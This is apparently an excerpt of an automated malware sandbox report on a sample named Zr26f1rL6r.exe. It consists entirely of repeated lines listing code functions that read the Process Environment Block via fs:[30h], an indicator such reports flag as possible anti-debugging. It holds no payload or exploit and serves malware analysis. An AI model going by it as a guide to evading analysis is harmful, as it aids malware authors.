Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994E62 mov eax, dword ptr fs:[00000030h]		10_2_1E994E62
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C1E70 mov eax, dword ptr fs:[00000030h]		10_2_1E8C1E70
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F7E71 mov eax, dword ptr fs:[00000030h]		10_2_1E8F7E71
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FCE70 mov eax, dword ptr fs:[00000030h]		10_2_1E8FCE70
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]		10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]		10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]		10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]		10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]		10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]		10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]		10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]		10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]		10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]		10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]		10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]		10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EBF93 mov eax, dword ptr fs:[00000030h]		10_2_1E8EBF93
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E948F8B mov eax, dword ptr fs:[00000030h]		10_2_1E948F8B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E948F8B mov eax, dword ptr fs:[00000030h]		10_2_1E948F8B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E948F8B mov eax, dword ptr fs:[00000030h]		10_2_1E948F8B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C1FAA mov eax, dword ptr fs:[00000030h]		10_2_1E8C1FAA
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F8FBC mov eax, dword ptr fs:[00000030h]		10_2_1E8F8FBC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C4FB6 mov eax, dword ptr fs:[00000030h]		10_2_1E8C4FB6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8ECFB0 mov eax, dword ptr fs:[00000030h]		10_2_1E8ECFB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8ECFB0 mov eax, dword ptr fs:[00000030h]		10_2_1E8ECFB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97EFD3 mov eax, dword ptr fs:[00000030h]		10_2_1E97EFD3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h]		10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h]		10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h]		10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FFDC mov ecx, dword ptr fs:[00000030h]		10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h]		10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h]		10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B9FD0 mov eax, dword ptr fs:[00000030h]		10_2_1E8B9FD0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]		10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]		10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]		10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]		10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]		10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]		10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]		10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]		10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]		10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]		10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]		10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]		10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]		10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]		10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]		10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994FFF mov eax, dword ptr fs:[00000030h]		10_2_1E994FFF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E8FFB mov eax, dword ptr fs:[00000030h]		10_2_1E8E8FFB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBF0C mov eax, dword ptr fs:[00000030h]		10_2_1E8FBF0C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBF0C mov eax, dword ptr fs:[00000030h]		10_2_1E8FBF0C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBF0C mov eax, dword ptr fs:[00000030h]		10_2_1E8FBF0C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994F1D mov eax, dword ptr fs:[00000030h]		10_2_1E994F1D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E900F16 mov eax, dword ptr fs:[00000030h]		10_2_1E900F16
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E900F16 mov eax, dword ptr fs:[00000030h]		10_2_1E900F16
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E900F16 mov eax, dword ptr fs:[00000030h]		10_2_1E900F16
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E900F16 mov eax, dword ptr fs:[00000030h]		10_2_1E900F16
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DCF00 mov eax, dword ptr fs:[00000030h]		10_2_1E8DCF00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DCF00 mov eax, dword ptr fs:[00000030h]		10_2_1E8DCF00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FF03 mov eax, dword ptr fs:[00000030h]		10_2_1E93FF03
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FF03 mov eax, dword ptr fs:[00000030h]		10_2_1E93FF03
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FF03 mov eax, dword ptr fs:[00000030h]		10_2_1E93FF03
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E948F3C mov eax, dword ptr fs:[00000030h]		10_2_1E948F3C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E948F3C mov eax, dword ptr fs:[00000030h]		10_2_1E948F3C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E948F3C mov ecx, dword ptr fs:[00000030h]		10_2_1E948F3C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E948F3C mov ecx, dword ptr fs:[00000030h]		10_2_1E948F3C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDF36 mov eax, dword ptr fs:[00000030h]		10_2_1E8DDF36
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDF36 mov eax, dword ptr fs:[00000030h]		10_2_1E8DDF36
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDF36 mov eax, dword ptr fs:[00000030h]		10_2_1E8DDF36
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDF36 mov eax, dword ptr fs:[00000030h]		10_2_1E8DDF36
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BFF30 mov edi, dword ptr fs:[00000030h]		10_2_1E8BFF30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97AF50 mov ecx, dword ptr fs:[00000030h]		10_2_1E97AF50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97BF4D mov eax, dword ptr fs:[00000030h]		10_2_1E97BF4D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E916F70 mov eax, dword ptr fs:[00000030h]		10_2_1E916F70
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994F7C mov eax, dword ptr fs:[00000030h]		10_2_1E994F7C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97EF66 mov eax, dword ptr fs:[00000030h]		10_2_1E97EF66
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BEF79 mov eax, dword ptr fs:[00000030h]		10_2_1E8BEF79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BEF79 mov eax, dword ptr fs:[00000030h]		10_2_1E8BEF79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BEF79 mov eax, dword ptr fs:[00000030h]		10_2_1E8BEF79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BBF70 mov eax, dword ptr fs:[00000030h]		10_2_1E8BBF70
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C1F70 mov eax, dword ptr fs:[00000030h]		10_2_1E8C1F70
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAF72 mov eax, dword ptr fs:[00000030h]		10_2_1E8EAF72
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97FC95 mov eax, dword ptr fs:[00000030h]		10_2_1E97FC95
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h]		10_2_1E8B7C85
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h]		10_2_1E8B7C85
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h]		10_2_1E8B7C85
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h]		10_2_1E8B7C85
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h]		10_2_1E8B7C85
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E969C98 mov ecx, dword ptr fs:[00000030h]		10_2_1E969C98
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E969C98 mov eax, dword ptr fs:[00000030h]		10_2_1E969C98
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E969C98 mov eax, dword ptr fs:[00000030h]		10_2_1E969C98
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E969C98 mov eax, dword ptr fs:[00000030h]		10_2_1E969C98
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E943C80 mov ecx, dword ptr fs:[00000030h]		10_2_1E943C80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C7C95 mov eax, dword ptr fs:[00000030h]		10_2_1E8C7C95
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C7C95 mov eax, dword ptr fs:[00000030h]		10_2_1E8C7C95
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F9CCF mov eax, dword ptr fs:[00000030h]		10_2_1E8F9CCF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E953CD4 mov eax, dword ptr fs:[00000030h]		10_2_1E953CD4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E953CD4 mov eax, dword ptr fs:[00000030h]		10_2_1E953CD4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E953CD4 mov ecx, dword ptr fs:[00000030h]		10_2_1E953CD4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E953CD4 mov eax, dword ptr fs:[00000030h]		10_2_1E953CD4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E953CD4 mov eax, dword ptr fs:[00000030h]		10_2_1E953CD4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E945CD0 mov eax, dword ptr fs:[00000030h]		10_2_1E945CD0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CFCC9 mov eax, dword ptr fs:[00000030h]		10_2_1E8CFCC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B6CC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8B6CC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B6CC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8B6CC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B6CC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8B6CC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994CD2 mov eax, dword ptr fs:[00000030h]		10_2_1E994CD2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F6CC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8F6CC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E8CDF mov eax, dword ptr fs:[00000030h]		10_2_1E8E8CDF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E8CDF mov eax, dword ptr fs:[00000030h]		10_2_1E8E8CDF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDCD1 mov eax, dword ptr fs:[00000030h]		10_2_1E8DDCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDCD1 mov eax, dword ptr fs:[00000030h]		10_2_1E8DDCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDCD1 mov eax, dword ptr fs:[00000030h]		10_2_1E8DDCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FCCD1 mov ecx, dword ptr fs:[00000030h]		10_2_1E8FCCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FCCD1 mov eax, dword ptr fs:[00000030h]		10_2_1E8FCCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FCCD1 mov eax, dword ptr fs:[00000030h]		10_2_1E8FCCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93CCF0 mov ecx, dword ptr fs:[00000030h]		10_2_1E93CCF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7CF1 mov eax, dword ptr fs:[00000030h]		10_2_1E8B7CF1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E940CEE mov eax, dword ptr fs:[00000030h]		10_2_1E940CEE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3CF0 mov eax, dword ptr fs:[00000030h]		10_2_1E8C3CF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3CF0 mov eax, dword ptr fs:[00000030h]		10_2_1E8C3CF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EECF3 mov eax, dword ptr fs:[00000030h]		10_2_1E8EECF3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EECF3 mov eax, dword ptr fs:[00000030h]		10_2_1E8EECF3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E957CE8 mov eax, dword ptr fs:[00000030h]		10_2_1E957CE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F2C10 mov eax, dword ptr fs:[00000030h]		10_2_1E8F2C10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F2C10 mov eax, dword ptr fs:[00000030h]		10_2_1E8F2C10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F2C10 mov eax, dword ptr fs:[00000030h]		10_2_1E8F2C10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F2C10 mov eax, dword ptr fs:[00000030h]		10_2_1E8F2C10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E985C38 mov eax, dword ptr fs:[00000030h]		10_2_1E985C38
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E985C38 mov ecx, dword ptr fs:[00000030h]		10_2_1E985C38
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C20 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3C20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DAC20 mov eax, dword ptr fs:[00000030h]		10_2_1E8DAC20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DAC20 mov eax, dword ptr fs:[00000030h]		10_2_1E8DAC20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DAC20 mov eax, dword ptr fs:[00000030h]		10_2_1E8DAC20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E957C38 mov eax, dword ptr fs:[00000030h]		10_2_1E957C38
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F4C3D mov eax, dword ptr fs:[00000030h]		10_2_1E8F4C3D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B8C3D mov eax, dword ptr fs:[00000030h]		10_2_1E8B8C3D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994C59 mov eax, dword ptr fs:[00000030h]		10_2_1E994C59
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E943C57 mov eax, dword ptr fs:[00000030h]		10_2_1E943C57
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BDC40 mov eax, dword ptr fs:[00000030h]		10_2_1E8BDC40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C40 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3C40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBC6E mov eax, dword ptr fs:[00000030h]		10_2_1E8FBC6E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBC6E mov eax, dword ptr fs:[00000030h]		10_2_1E8FBC6E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCC68 mov eax, dword ptr fs:[00000030h]		10_2_1E8BCC68
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C0C79 mov eax, dword ptr fs:[00000030h]		10_2_1E8C0C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C0C79 mov eax, dword ptr fs:[00000030h]		10_2_1E8C0C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C0C79 mov eax, dword ptr fs:[00000030h]		10_2_1E8C0C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h]		10_2_1E8C8C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h]		10_2_1E8C8C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h]		10_2_1E8C8C79
